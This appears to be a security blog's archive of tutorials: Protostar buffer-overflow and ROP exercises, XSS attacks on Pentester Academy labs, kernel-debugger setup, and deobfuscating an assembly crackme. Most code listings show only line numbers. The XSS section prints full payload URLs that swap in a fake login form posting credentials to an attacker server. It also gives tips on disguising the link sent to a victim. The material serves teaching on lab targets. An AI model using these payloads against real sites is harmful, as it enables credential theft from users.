Normal view
First LKM
An Easy Linux Crackme
Plain Format String Vulnerability
Command Injection in Basilic
A Simple Character Device
Remote Exploitation
Basic Binary Auditing
XSS in PNP4Nagios
Beating ASLR
System Call Hooking
An Easy Windows Crackme
Ret2Libc and ROP
So far, all of our exploits have included shellcode, on most (if not all) modern systems it isn't possible to just run shellcode like this because of NX.
NX disallows running code in certain memory segments, primarily memory segments that contain variable data, like the stack and heap.
A number of techniques were created to beat NX and I want to demostrate 2 of them here, return to libc (Ret2Libc) and return-oriented programming (ROP).
This will be slightly different to my previous posts as I will not be hacking an application that I wrote but instead taking on 2 challenges from the protostar section of exploit exercises.
The challenges that we will look at here are stack6 and stack7.
While these challenges have both NX and ASLR disabled they both implement their own protection which disables the straight running of shellcode.
Stack6: The App
So if you look at the webpage for stack6, it actually gives you the source code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
|
The buffer overflow is on line 13, the application then gets the function return address on line 15 and checks it on line 17.
If the return address begins with bf
the application exits, stack addresses normally begin with bf
so you cannot just overwrite it with an address on the stack.
One other thing to notice here is that the vulnerable line is using the gets
function, this function will only stop once it reaches a newline (\n) or end of file (EOF) character so we do not need to avoid null (\0) characters.
Stack6: The Easy Way
While I've written this post to demonstrate Ret2Libc and ROP we can get our shellcode to run on these 2 challenges using the exact same method which I'll explain quickly here.
So our buffer is 64 bytes long, we have the local variable ret
which is 4 bytes, then we have the saved EBP from main's stack frame and finally the return address, its worth noting that the stack has to be 16 byte aligned so 8 will need to be added before you get to the return address. So we need to write 64+4+4+8 = 80
bytes before we overwrite the return address and hijack EIP.
Lets test this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
|
So we were correct, we can now test what happens if we write an address beginning with bf
:
1 2 |
|
As you can see we've hit the printf
inside the if
statement and exited without seg faulting.
If there was a jmp esp
or ff e4
in the application code we could use the same method we used in the beating ASLR post but that isn't the case here.
We can still run our shellcode though using a slightly more complex method, the application is only checking the return address of the current function (note the argument to the __builtin_return_address
function call), so we just need to make sure that this address doesn't start with bf
.
We'll do this by using 1 ROP "gadget", let's first find the address of our gadget:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 |
|
All we're looking for here is a ret
instruction, there are a few, we'll use the 1 on line 258, the address of this is 80485a9
so this will be our return address.
After the return address we insert some junk data (4 bytes) and then we will put the address of our shellcode.
First let's find the address that our shellcode will be at, this needs to be done in 2 terminals:
1 2 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
|
1 |
|
1 2 3 4 5 6 7 8 9 10 11 |
|
This means our payload will start at 0xbffff780+0xc = 0xbffff78c
.
For this challenge I will put the shellcode at the end of the payload, we know the starting address of our payload and how many bytes until the shellcode so our shellcode will be at 0xbffff78c+0x58 = 0xbffff7e4
.
I first tried with a normal shellcode that I had written but it didn't work:
1 2 3 4 5 |
|
Reflected XSS at PentesterAcademy
Here I will demonstrate 3 XSS attacks against 3 different challenges on Pentester Academy.
Pentester Academy has a large number of courses and challenges devoted to learning penetration testing and improving your skills.
My aim here will be first to demonstrate basic reflected XSS and then show how 2 different filters can be beaten.
XSS is the ability to execute JavaScript inside the browser of anyone who visits a specific webpage usually by injecting a combination of HTML and JavaScript.
Challenge 16: HTML Injection
The first one we'll look at is challenge 16.
This is the actual challenge page, if you browse to it, you should see this:
What I'm going to do is replace the whole form with one of my own which submit's to a server of my choosing and has an extra field but, otherwise, looks exactly the same as the real 1.
First, let's have a look at the vulnerability. First we need to see what happens when we submit a form:
I submitted the form with foo
in the username field and bar
in the password field. This is the full URL that I end up with:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=foo&password=bar
As you can see, this was just submitted to the same page as a GET request. As this is the case, we can just manipulate this URL to test the fields, if the form had submitted a POST request, we'd have to keep submitting the form or use something like Burp Suite's Repeater feature.
You can see that the value of the email field has been reflected in the username input box. This is where we can test for a reflected XSS/HTMLi vulnerability.
Before that, let's check the source of this page to see in what context on the page our input has landed, right click on the page and click something like View Source:
So we've landed inside the value
attribute of an input tag.
Now let's check if we can use certain characters, send the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=foo"<'()[]>&password=bar
It looks like theres little to no filtering here, we've managed to close the input
tag with the greater than (>) character that we sent, but let's look at the source:
So as suspected, there has been no filtering, this makes our job much easier.
Looking at the source code of the vulnerable form, we can figure out any required prefix and suffix:
1 2 3 4 5 6 7 8 9 |
|
All we should need to do here is break out of the value
attribute and the input
tag, to do this we'll need to put a double quote (") (because the value attribute was opened with a ") and >, respectively, at the start of our input.
We should now test for the classic alert box XSS payload with our prefix of ">
by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>alert('xss')</script>
It worked, I put the alert statement inside script
tags, this is to tell the browser that this is JavaScript to be executed.
If you close the alert box and view the source you should see this:
Using this we can run any JavaScript we want, we just have to replace alert('xss')
, and as I will demonstrate this allows us full control over the page that is displayed.
The first thing we need to do is remove the current form so that we can put our own form in its place.
We can find all of the forms on the page using the getElementsByTagName
method.
The best way to build your JavaScript payload is to use Firebug, it allows you to write JavaScript dynamically while showing you what methods and attributes each object has avaliable.
If you open firebug, go to the Console tab and type document. if will show you a list of its methods and attributes.
If you look through the whole source of the webpage you will see that there is only 1 form
, and getElementsByTagName
returns an array containing all of the form
objects so to access the actual form we need to run document.getElementByTagName("form")[0]
to access the first element of the array:
Each object has a remove method, we can use this to remove the original form
.
Also, in JavaScript, all instructions can be put on a single line but they should be seperated by a semi colon (;).
Let's try using the XSS to first remove the form
using the method described and then trigger and alert box as we did before, for this we will use the following URL:
pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove();alert('xss')</script>
So that didn't work, let's look at the source and see what happened:
So it appears that our payload was cut off from the ;, we can solve this 2 ways, the first is easiest and most well known, replace the ; with a URL encoded version (%3b):
pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove()%3balert('xss')</script>
That works, but I also want to show you another method incase ;'s are blocked completely, ;'s can be replaced with comma's (,).
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove(),alert('xss')</script>
From this point on I'll use ,'s to seperate the instructions when sent to the server but in my examples while building the JavaScript payload I'll use ;'s.
Now we need to create the new form
, we can do this using the createElement
and appendChild
methods, as well as the className
, innerHTML
, placeholder
, name
, type
and action
attributes.
Here is a full version of the Javascript that will build the form that we want and ensure it has all of the necessary attributes to make it look athentic:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
|
All of the information here, especially the class names, I got from the original form
. I've created a new form field on line 7 and set its settings on lines 10, 17, 18 and 19.
On line 30, I set the form action to http://localhost:9000/
, this means when the form is submitted it will send the request to localhost
on port 9000
, this could be set to any value/server under the attackers control.
The completed form
is contained inside the form variable.
The last thing to do is place the form at the right place on the page. If you look through the source, the form
is placed inside a div
tag with the class container
, before a div
tag with a class well
.
We can find both of these using the getElementsByClassName
method and we can insert it using the insertBefore
, here is the code for this:
1 2 3 |
|
Now we have all of the code we want to run, we just need to shrink the code as much as possible, we do this because in any exploit its best to keep the payload as small as possible so there is less chance of it being noticed.
Firstly all of the spaces need to be removed, in most situations spaces only make the code easier to read, next we can shrink all of the variable names down to 1 character, let's just take the first character of each as their name, unless use strict;
is used on the page (which it isn't) there is no need to declare the variables with the var
keyword and lastly we use the document
object repeatedly, we can create a variable with a 1 character name that point to it and use the variable instead (d=document;
).
After applying the rules above, moving everything to 1 line and changing the ;'s with ,'s you get the following code:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
We could probably shrink this down some more but this will do for now.
To send this payload we have to send the payload inbetween the script
tags, after that you should see the following:
Looking at the source we can see that it has been injected fine:
Python Capture Server
I've written a little python script using SimpleHTTPServer to capture these details:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
|
This server is set to print the values to stdout and then redirect to the actual application.
With the above python server running, when our custom form is submitted you get the following:
And the output on the python server's stdout:
1 2 3 4 |
|
So that is challenge 16 completed for what we wanted to achieve and everything is transparent to the end user, you just need to send the malicious link to the target.
Challenge 16 Secure
The next challenge is here, some filtering has been added to mitigate the previous exploit.
First let's look at the challenge:
This looks exactly the same as the last challenge, so let's use the application and see if that is the same:
So far everything looks the same, even the URL we are sent to:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=foo&password=bar
Let's analyse this application the same way as before by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=foo"<'()[]>
Looks interesting, let's look at the source:
So < and > has been encoded but " hasn't, looks like we'll have to use an event handler to run our JavaScript this time.
Ideally we want the event handler to run without any interaction, a lot of the event handlers require some interaction.
We are landing inside an input
tag and 1 event we can hook is the onfocus
event, but we need to make sure that the input
box is in focus when the page loads, for this we can use the autofocus
attribute.
So we now need a new prefix for our payload, we need to close the value attribute, with a ", we then need a space and the autofocus
keyword, then a space and lastly onfocus="
, so we end up with:
" autofocus onfocus="
After this there is no need to put any script
tags, we can't anyway because < and > gets encoded.
Let's try executing an alert box to test if XSS works here, we need to send the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=" autofocus onfocus="alert('xss')
So we can now run JavaScript on this page, we will recreate the exact same attack as last time, the only change we need is to replace every " with a single quote ('), then we end up with this as our JavaScript:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Sending this in place of alert('xss')
in our previous request gives us the following:
Looking at the source, we can see how our payload got interpreted:
Now we are in the same position as we were when we'd got our custom form on the other page.
Last Challenge: DOM XSS
This is the last challenge I'd like to demonstrate.
Even though this challenge is very different I want to create the same exploit where I create a custom form and put it on the page in a similar position as the previous examples.
Its quite a bit more difficult to exploit but let's get to it and have a look at how it works:
Its clearly doing some maths here based on the value of the statement
argument given in the address bar, let's look at the source:
So we are landing inside script
tags and our input is being used as an argument to eval
.
This time, however, we can't see how our payload is being interpreted directly.
We should be able to run any JavaScript inside here though, let's try a normal alert box by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=alert('xss')
That didn't work, let's open Firebug, open the console tab and try again (this should show us any error's that happened while it was executing any JavaScript):
So the problem is that the ' are URL encoded... This is because, as you can see from the source code, it is accessing the argument using the document.URL
property where certain characters are URL encoded so we will be unable to use any types of quotes (' or ").
There are probably a few ways to beat this problem, an obvious 1 is to avoid using strings but we are unable to do that here.
The way I like to get around this is to use String
objects and using forward slashes (/) at the beginning and end to imply it is a regular expression.
Let's try to execute an alert using this method, we need to send the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=alert(String(/xss/))
So it worked but we have / surrounding the string, we can use the substring
method and the length
property to remove these, we need to send the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=x=String(/xss/),alert(x.substring(1,x.length-1))
We will be using the String
and substring
methods a lot, so it would be best if we create aliases for these to shorten our payload, we can create a function for the substring
section like this:
y=function(z){return/**/z.substring(1,z.length-1)}
I have used /**/ here because we are also unable to use spaces (they are URL encoded too) and this just acts as a comment.
This function takes 1 argument and returns the string with the first and last character removed.
We can create an alias for the String
method using this code:
S=String
Before we start to write our payload, let's test this with an alert by sending the following URL:
http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=S=String,y=function(z){return/**/z.substring(1,z.length-1)},alert(y(S(/xss/)))
So it works, lastly all we need to do is remove the string Mathemagic
and the div
tag that contains the result.
Looking at the source we can see that the Mathemagic
string is contained in a h2
tag and there are no other h2
tags on the page, so we can find this using the getElementsByTagName
method.
The result is contained inside a div
tag which has the id
value set to result
, so we can find this using the getElementById
method.
Both of these we can remove using the remove
method.
We are now ready to write our payload, here is the "beutified" version of the payload, remember that this all goes on 1 line and with , seperating the instructions and not ;:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
|
So using this the URL that you will need to send is:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
After sending this URL you should see the following:
PWNED!!! :-)
Conclusion
For the last to exploits, the redirection URL of the python server would have to be changed.
XSS exploits can vary greatly, but as long as you can get JavaScript to run you should be able to get full control over the page.
There are various methods for bypassing different filters and I've only mentioned a couple here but the methods that you use will highly depend on the filter that you are facing.
A lot of trial and error is needed to determine how best to bypass the filter than is in place.
In each of these examples, to take advantage of the exploit, you need to send the URL that we have created to the victim. A URL containing all of this information might look very strange to the victim so it might be best to URL encode the whole payload, you can do this in BurpSuite's Decoder tab or on a website like this, its worth noting though that Burp will URL encode all of the text (incuding any alphanumeric characters), that website (like most) will only encode certain characters.
Further Reading
OWASP is the authority on web security so their website contains any relavent information regarding this.
The OWASP XSS page and XSS filter evasion cheat sheet are very good resources.
Also, the OWASP testing guide has a great page on how to go about testing for XSS.
Usermode Application Debugging Using KD
I have started the Windows kernel hacking section with a simple explaination of the setup and a quick analysis of the crackme, that we analysed here, using the kd.exe kernel debugger.
I chose to do this instead of any actual Windows kernel stuff because its a steep learning experience learning how to use KD so its probably best to look at something you have already seen.
Setting Up The Environment
For this post I will be using a total of 4 machines, 3 virtual machines using VMware Player (you probably could use Virtualbox for this also though) hosted on a reasonably powerful machine and a laptop.
You can however do all of this with just 1 physical machine, hosting 1 virtual machine and I will explain the differences in the setup afterwards but I'll first explain the setup I am using.
Here is a visual representation of the network:
So I have 3 virtual machines on my machine running VMware Player:
1 Kali Linux, 1 Windows XP Professional and 1 Windows 7 Home Edition. All 3 of these are 32bit, although it doesn't matter but to follow along you would probably want the debuggee (the Windows 7 machine in my setup) to be 32bit. In my 2 machine setup described below the host (and debugger) is a Windows 7 64bit machine.
The Kali machine has 2 network interfaces, 1 setup in Bridged mode (so that I can SSH directly to it):
And the other setup in Host-only mode (So that it has access to the other 2 machines):
The Windows XP machine has 1 network interface setup in Host-only mode:
And the same for the Windows 7 machine:
The Windows XP and Windows 7 machines are also connected via a virtual serial cable, this is for the debugger connection.
The Windows XP machine will be the client (or the debugger):
And the Windows 7 machine will be the server (or the debuggee):
The Windows 7 machine needs both Visual Studio Express 2013 for Windows Desktop and the Windows Driver Kit (WDK) installed on it. You can get them both here.
The Windows XP machine needs Microsoft Windows SDK for Windows 7 installed, which you can get here. To install this you need to install the full version of Microsoft .NET Framework 4, which you can get here (Bare in mind that you might need an internet connection while you install these so just change the network adaptor configuration to NAT and then once it is installed change it back to Host-only again).
If the debugger is a Windows 7 machine then you will need to install the same software as on the debuggee.
Once these are installed, its best to add the path to the kd.exe application to the PATH variable.
You do this by going in to the properties of My Computer and, on Windows 7 going to Advanced system settings->Environment Variables... or on Windows XP going to Advanced->Environment Variables... and scroll down the Path and click Edit.
The path on Windows 7 should be something like C:\Program Files\Windows Kits\8.1\Debuggers\x86 and on Windows XP C:\Program Files\Debugging Tools for Windows (x86).
For remote administration I've installed TightVNC on both of the Windows machines.
I set it up with access through a Kali machine so that I can setup SSH tunnels and get VNC access to the Windows machines without giving them access to the outside network.
After TightVNC is up and running on your Windows machines, you can setup the SSH tunnels like this (For this explaination we'll imagine that the Windows XP machine is on the VMware virutal network with an IP of 172.16.188.130, the Windows 7 machine is on 172.16.188.131 and that our Kali machine is also on this network):
1 2 |
|
Now if you VNC to 127.0.0.1 you will have access to the Windows XP machine and to 127.0.0.1:1 you will have access to the Windows 7 machine.
1 VM Setup
You can also setup this up with 2 machines, the VMware host (running Windows, which will be the debugger) and the VMware guest (also running Windows, which will be the debuggee).
The serial port configuration for the debuggee in VMware in this setup should look like this:
Notice the different file path and name for Windows, the other end should be set to The other end is an application and Yeild CPU on poll should be checked.
The only other thing that is different is the command you will use to launch KD on the debugger (we haven't got to that but it is shown below for my 4 machine setup), you should instead use kd -k com:port=\\.\pipe\com_1,pipe
.
Using KD
On Windows 7 (the debuggee) you will need to tell it to lanuch the debugger on boot, for this you need to run an Administrator command prompt and:
1 2 3 4 5 |
|
The DEBUGPORT:2 option here is the port number of the COM port that you are going to use, for me it was COM2 hence the number 2.
Now we launch the kernel debugger on the Windows XP machine (this is the command that is different on the 2 machine setup):
1 2 3 4 5 6 7 |
|
Again the port=1 option here is the COM port that you are going to be using, I will be using COM1 on this machine hence the 1.
Then reboot the Windows 7 machine and watch the KD terminal on the Windows XP machine:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Now run the crackme application on the debuggee (Windows 7):
Go back to the Windows XP machine and in the debugger terminal window press Control + C:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
Now we have broken into the kernel, this means that anything we do will be in the context of the kernel, we can see this in the debugger:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 |
|
On line 1 I run the .process command without any parameters and it tells us the process we are currently in (844bdae8 is the EPROCESS number).
On line 3 I run the !process extension with 0 0 as its arguments, this lists all of the running processes and some details about them, as you can see from lines 5-7, EPROCESS 844bdae8 is the System process, or the kernel.
What we want to do is change the context to our crackme application, which you can see from lines 141-143 has the EPROCESS of 85abfd40:
1 2 3 4 5 6 7 8 9 10 11 |
|
On line 1 I use the .process command to change the context to our crackme application but before the context can be changed execution needs to be resumed (which is done on line 5).
Now we can set a breakpoint anywhere in the crackme's virtual memory address space, we want to break with them calls to GetDlgItemTextA that were responsible for getting the text in the textboxes of the application (If you are unsure about what I am talking about, please go back and review the previous post):
1 2 3 4 |
|
Now that the breakpoint is set we can resume execution, wait for it to be hit and inspect the memory.
Remember that the prototype for GetDlgItemText is:
1 2 3 4 5 6 |
|
1 2 3 4 5 6 7 8 9 |
|
On line 5 I use the dd command to display 4 double words on the top of the stack. The first dword will be the return address (as you will see in a minute), then we have the first 3 arguments.
The 3rd argument is the address where the buffer for the string is, on line 7 I use the da command to display the ascii value at that address.
Keep in mind that this is the start of the function so the value hasn't been fetched yet, we can see the returned value by tracing through until we are in the calling function using the ug command and checking again:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
As you can see the value is the same (because we haven't changed the text in the textbox), you can also see the address which it returned back to after executing GetDlgItemTextA was 0040127f, which was the top value on the stack.
Lastly let's resume and make sure it does the same with the other textbox:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Conclusion
This was only a simple tutorial to get the environment set up and get a basic grasp of kd.exe and some of its commands.
This was by no means an exhaustive list of commands and extensions, the debugger comes with many and has very good documentation.
Hopefully you now have a better understanding of how to debug using kd.exe and you now have the environment to do it in.
Further Reading
The Debugging and Automation chapter in Practical Reverse Engineering by Bruce Dang, Alexandre Gazet and Elias Bachaalany.
Also the kd.exe documentation that ships with the WDK or SDK.
Reversing A Simple Obfuscated Application
I created this application as a little challenge and some practice at manually obfuscating an application at the assembly level.
I wrote the application in IA32 assembly and then manually obfuscated it using a couple of different methods.
Here I will show how to solve the challenge in 2 different ways.
Lastly I will show how the obfuscation could have been done better so that it would have been a lot more difficult to solve this using a simple static disassembly.
The Challenge
We are given the static disassembly below of a 32bit linux application which says whether or not the author is going to some event:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
|
The challenge is to figure out whether or not the author is going based solely on this static disassembly.
Method 1: The Easy Way
In this method we'll rebuild the application and simply run it to get the answer.
The first step is to copy the instruction into a new nasm file, if we do that we get:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 |
|
When we try to assemble this we get:
1 2 3 4 5 6 7 8 9 10 11 |
|
Looking at the lines that have caused the errors:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
You can see that its all lines that have [SIZE] PTR, we will remove any DWORD PTR and BYTE PTR and for the lines that had BYTE put that before the first operand, so they end up like this:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Now we try to assemble it again:
1 2 3 |
|
So there is still a problem with 2 lines, it looks as if these instructions are invalid, this could possibly be data, what we shall do is replace these 2 instructions with the raw opcodes from the disassembly, so our application ends up like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 |
|
If we assemble this and test it out:
1 2 3 4 |
|
So it assembles and links now but we get a segmentation fault. Let's investigate why:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 |
|
So it looks as if we've landed in the middle of an instruction.
Near the start of the application (on line 16 above), it jumps it a certain memory address which is the middle of an instruction. The resulting instruction, as seen on line 9, tries to move a value to the address pointed to by the EAX register.
On line 11 you can see that the value in EAX is 0, which is what caused the segfault, 0 is an invalid memory address.
The reason for this is because the original application jumped to static memory addresses, in the application the memory addresses are different so this will need to be fixed for the application to work.
What we need to do is replace any fixed memory addresses with labels. We can find where in the application the memory addresses are meant to go by looking at the original disassembly.
Once we have done this the resulting application is as follows:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 |
|
There are a couple of values here (on lines 55, 59 and 60) which look like memory addresses but they aren't valid memory addresses in the original disassembly so they could just be normal values or, as its in the same section as the invalid instructions, part of some data.
With this done we can test this application:
1 2 3 4 |
|
So we have our answer, the author is not going :-)
Method 2: The Hard Way
Here we will attempt to understand the application and figure out what the application does without building and running it.
Although you would have needed some understanding of IA32 to do the previous method, obviously you will need a better understanding of it to do this.
The first step would be what we have already done. Well, there would be no need for the ability to assemble the application, or even have a valid nasm file but we would need to replace any known addresses with labels because this will make the disassembly significantly easier to read.
For this will we just use the nasm file above (going-or-not-obf-test4.nasm), just because it will make this post a little shorter :-)
What we do now is follow the control flow of the application and simplfy it as we go by replacing more complex sequencies with less complex 1's or even only 1 instruction in some cases and removing any dead instructions (instructions which have no effect on the application at all) altogether.
This process is manual deobfuscation and can be applied to small sections of applications instead of just full applications like the last method.
Let's start with the first instruction mov edx,eax
, this looks like it is a junk line (or dead code) mainly because this is the first instruction of the application, if this was just a code segment instead of a full application this code would be more likely to be meaningful.
The second instruction mov edi,0x25
, is also very difficult to quickly determine its usefulness to the application, what we need to do here is take note of the value inside the EDI register.
The next 4 instructions do something interesting, if you follow the control flow of the application and line the instructions sequentially you get:
1 2 3 4 5 6 |
|
So the 3rd instruction (on line 5) is not related here, and is similar to the previous mov instruction, just make a note that bl contains 0x32.
The other 3 instructions are using a technique used in some shellcode to get the an address in memory when the code might start at a different point in memory.
Its called the JMP-CALL-POP technique and gets the address of the address immediately following the call instruction into the register used in the pop instruction.
Knowing this we can replace the entire code above with:
1 2 |
|
Let's look at the next 4 instructions:
1 2 3 4 5 |
|
So here, on line 5, we use the EDI register, we zero EAX, set it to 0xc9 (201), adds it to EDI (0x25 or 37) and stores the result in EAX, this series of instructions are what is called constant unfolding where a series of instructions are done to work out the actual required value instead of just assigning the value to begin with.
We could use the opposite, a common compiler optimization constant folding, to decrease the complexity of this code, so these 4 instructions could be replaced by:
1 |
|
The next 5 instructions are:
1 2 3 4 5 6 |
|
This set of instructions just sets EBP and ECX to 0 and EDX to 1. Now its obvious that the instrction at the beginning was dead code because EDX hasn't been used at all and now it has been overwritten.
We can rewrite the application so far in a much more simplfied way:
1 2 3 4 5 6 7 8 |
|
As you can see, this is much easier to read than the previous code that was jumping about all over the place.
I kept the assignment to EDI (on line 2) there because, although I've removed the need for it in assigning the value of EAX (on line 5), it still might be used in the future.
Also, the assignment to bl (on line 3) still might not be needed but we shall keep it there just incase.
Let's quickly review the state of the registers:
1 2 3 4 5 6 7 |
|
The register state and code rewrite should be constantly updated as you go through the code.
The next instruction is lea ebp,[esp+ecx*1]
, which is the same as EBP = ESP + ECX * 1 or EBP = ESP + 0 * 1 or EBP = ESP.
After this instruction we enter the following loop:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
So this first moves a byte at ESI + EDX * 1, which is basically just ESI + EDX, into the cl register. We know at this point the value inside EDX is 1 and that ESI points to some address in the middle of the application, so our loop will start getting data 1 byte after that address.
This byte is them compared with al, which we know is 0xee, and if they are the same execution will jump to Six.
Providing the jump to Six isn't taken, the byte is moved to the top of the stack (which ESP points to), ESP is adjusted accordingly, EDX is incremented by 1 and the loop is rerun.
The mov instruction on line 8 doesn't do anything, dead code which can be removed.
Now we can find all of the data that is being worked on here:
1 |
|
The starting address of this data is 80480bc in the original disassembly, which is 1 byte after the address of the instruction following the call instruction in the jmp-call-pop routine at the start of the application.
It ends with the ee value because this is the point at which the jump to Six is taken.
Also, notice that nowhere here is a 0x0 (or 00) byte, this means that the jg (jump if greater than) instruction on line 10 will always be taken, every byte there is above 0 so the 2 instructions after are dead code and can be removed from the analysis and the jg can be replaced with a jmp.
It is clear that this data, which is sitting in the middle of the application, is being put on the stack for some reason, the lea instruction right before the loop just saved the address pointing to the beginning of the new location of the data on the stack into the EBP register.
We could try to figure out how meaningful this data is now but it would be best to have a look to see what the application does with it first.
Now let's take the jump to Six:
1 2 3 |
|
First it loads the address of the data on the stack, currently in EBP, into EDX.
cl, which is currently 0xee, is put onto the stack and ESP is adjusted accordingly.
We then enter into the 2nd loop:
1 2 3 4 5 6 7 8 9 10 |
|
This is a very unusual loop, you will only see this type of code when reversing obfuscated code.
It started by pushing its own address to the stack, this allows the ret on line 10 to return to Seven.
The test instruction on line 3 is dead code because all test does is set EFLAGS, but they are immediately overwritten by the cmp instruction that follows.
Lines 4 and 5 again test the value of a byte in the data, this time pointed to by EDX, against 0xee and jump's to Eight when its reached.
The next 2 instructions, lines 6 and 7, move the value from EDI into EBX and add's 0x1f to it. We already know that 0x25 is currently in EDI, so EBX = 0x25 + 0x1f or EBX = 0x44.
The byte in the data is then xor'd with bl (or 0x44) and EDX is decremented.
Clearly this is a simply xor encoding of the data, I wrote a python script a while ago to xor a number of bytes with 1 byte and output both the resulting bytes as ascii characters, and the same but with the characters reversed (due to little endian architectures), here is the script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
This script is very simple, 1 thing to bare in mind though is that, because we are dealing with data outside of the printable ascii range (0x20 - 0x7e), we can just type the characters on the command line.
So we run the script like this:
1 2 3 4 5 6 7 8 9 10 |
|
So now we know what that data is in the middle of the application, clearly it was done like this to confuse but we have reversed enough of the application now to figure out what this is.
With this is mind, we no longer need those 2 loops, or any of the code aimed at moving and decoding the data, we can simply put it in as is.
Let's review our rewritten application:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
I have obviously removed most of the code because it simply isn't needed now, I've made sure that EBP still points to the end of the data and EDX to the beginning just incase there is some reason for this, but most of the code so far was devoted to decoding the data which is no longer needed.
Now for the registers:
1 2 3 4 5 6 7 |
|
The next 5 instructions show another weird use of call and jmp:
